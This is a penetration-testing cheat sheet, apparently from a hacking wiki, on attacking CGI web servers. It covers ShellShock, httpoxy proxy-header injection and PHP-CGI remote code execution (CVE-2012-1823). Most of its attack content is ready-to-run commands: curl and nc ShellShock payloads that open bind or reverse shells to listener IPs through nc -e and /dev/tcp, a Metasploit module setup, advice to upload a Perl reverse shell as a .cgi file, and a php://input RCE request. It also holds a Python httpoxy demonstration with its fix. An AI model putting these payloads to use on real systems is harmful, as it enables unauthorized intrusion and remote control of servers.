CGI


Information

CGI scripts are frequently Perl scripts, so if you have compromised a server that can execute .cgi scripts you can upload a Perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl), change the extension from .pl to .cgi, give it execute permissions (chmod +x) and request it from the web browser to trigger the reverse shell. To test for CGI vulnerabilities it is recommended to run nikto -C all (with all the plugins).

ShellShock

ShellShock is a vulnerability affecting Bash, the command shell widely used on Unix-like operating systems. It targets the way Bash imports functions from the environment: a variable whose value starts with "() {" is parsed as a function definition, and vulnerable versions keep executing whatever follows the closing brace. Attackers exploit this by placing malicious code in an environment variable that reaches a Bash process; the code runs as soon as that Bash starts. Since CGI turns every HTTP request header into an environment variable, a crafted header such as User-Agent is enough to run commands on the server.

A page affected by this vulnerability may respond with an error to a crafted request (the injected command's output lands where the web server expects CGI headers, which typically produces a 500), so an error page is itself an indicator.

You can spot this vulnerability by noticing that the server runs an old version of Apache with mod_cgi (there is a cgi folder, usually /cgi-bin/) or by running nikto.

Test

Most tests consist of sending something and expecting that string to come back in the web response. If you think a page may be vulnerable, search for all the cgi pages and test each of them.

Nmap

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Curl (reflected, blind and out-of-band)

# Reflected (the echo may end up in the header block and trigger a 500: check the error body/headers for the string too)
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that with tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band: any header works, here Cookie is used as an alternative to User-Agent (connects back to your listener)
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Shellshocker

python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi

Exploit

#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run

Proxy (MitM to Web server requests)

CGI creates an environment variable for every header in the HTTP request. For example, "host: web.com" becomes "HTTP_HOST"="web.com".

Since the HTTP_PROXY variable may be honoured by the web server (more precisely, by the HTTP client libraries the CGI script uses for its own outbound requests; this is the "httpoxy" issue), try sending a header "Proxy: <IP_attacker>:<PORT>". If the server makes any request during the session, you will be able to capture every request made by the server.
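To make the header-to-environment mapping concrete, an added example (not from the original page) that builds the CGI environment the way a server would, shows what a client that blindly honours HTTP_PROXY would do with an injected Proxy header, checks how the Python standard library's own proxy discovery behaves in that same environment, and applies the server-side fix. Hostnames and ports are made up.

```python
#!/usr/bin/env python3
"""Header-to-environment mapping in CGI and the injected "Proxy:" header
(httpoxy). Added example; hostnames and ports are made up."""
import json
import subprocess
import sys


def cgi_env_from_request(method, path, headers):
    """Build the CGI meta-variables a server exports to the script: every
    request header becomes HTTP_<NAME> with '-' turned into '_'. An
    attacker-supplied 'Proxy:' header therefore becomes HTTP_PROXY."""
    env = {"GATEWAY_INTERFACE": "CGI/1.1", "REQUEST_METHOD": method, "SCRIPT_NAME": path}
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def naive_outbound_proxy(env):
    """What a client library that simply reads HTTP_PROXY would route its
    outbound HTTP requests through: the attacker's listener."""
    return env.get("HTTP_PROXY") or env.get("http_proxy")


def proxies_seen_by_urllib(env):
    """Run urllib's proxy discovery in a child process with exactly this
    environment. Since the httpoxy fix (CVE-2016-1000110) Python ignores
    HTTP_PROXY when REQUEST_METHOD is present, i.e. when it runs as CGI."""
    code = ("import json, urllib.request; "
            "print(json.dumps(urllib.request.getproxies_environment()))")
    out = subprocess.run([sys.executable, "-c", code], env=env,
                         capture_output=True, text=True, check=True)
    return json.loads(out.stdout)


def harden_env(env):
    """Server-side fix: never export the client's Proxy header. Equivalent to
    Apache 'RequestHeader unset Proxy early' or nginx 'fastcgi_param HTTP_PROXY "";'."""
    return {k: v for k, v in env.items() if k != "HTTP_PROXY"}


if __name__ == "__main__":
    # Constructed request: a normal GET with an attacker-controlled Proxy header.
    request_headers = {"Host": "web.com", "User-Agent": "curl/7.0",
                       "Proxy": "10.10.10.10:8080"}
    env = cgi_env_from_request("GET", "/cgi-bin/user.sh", request_headers)
    print("HTTP_PROXY exported to the script:", env.get("HTTP_PROXY"))
    print("naive client would proxy via:     ", naive_outbound_proxy(env))
    print("urllib as CGI sees proxies:       ", proxies_seen_by_urllib(env))
    print("after hardening:                  ", naive_outbound_proxy(harden_env(env)))
```

The interesting comparison is the third line of output: the same environment minus REQUEST_METHOD makes urllib pick up the injected proxy, which is exactly the situation for client libraries that never received an httpoxy fix.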

Old PHP + CGI = RCE (CVE-2012-1823, CVE-2012-2311)

Basically, if PHP runs as CGI (php-cgi) and the PHP version is "old" (<5.3.12 / <5.4.2) you can execute code. To exploit this vulnerability you need to reach some PHP file of the web server without sending parameters (in particular without sending the "=" character): a query string with no "=" is passed to the script as command-line arguments, and php-cgi parses them as its own options. So, to test for the vulnerability, access for example /index.php?-s (note the -s) and the source code of the application will appear in the response.

Then, to get RCE you can send this special query: /?-d allow_url_include=1 -d auto_prepend_file=php://input together with the PHP code to execute in the body of the request. Example:

curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

More info about the vuln and possible exploits: https://www.zero-day.cz/database/337/, cve-2012-1823, cve-2012-2311, Example CTF Writeup.
